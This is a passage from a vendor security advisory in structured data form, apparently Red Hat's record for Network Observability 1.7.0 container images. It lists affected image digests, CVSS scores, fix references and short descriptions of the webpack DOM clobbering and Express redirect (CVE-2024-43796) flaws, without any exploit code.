"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.1, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", version: "3.1", }, products: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", }, { cve: "CVE-2024-43796", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:28.106254+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311152", }, ], notes: [ { category: "description", text: "A flaw was found in Express. This vulnerability allows untrusted code execution via passing untrusted user input to response.redirect(), even if the input is sanitized.", title: "Vulnerability description", }, { category: "summary", text: "express: Improper Input Handling in Express Redirects", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43796", }, { category: "external", summary: "RHBZ#2311152", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311152", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43796", url: "https://www.cve.org/CVERecord?id=CVE-2024-43796", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43796", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43796", }, { category: "external", summary: "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553", url: "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553", }, { category: "external", summary: "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx", url: "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx", }, ], release_date: "2024-09-10T15:15:17.510000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-22T01:05:39+00:00", details: "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8014", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", 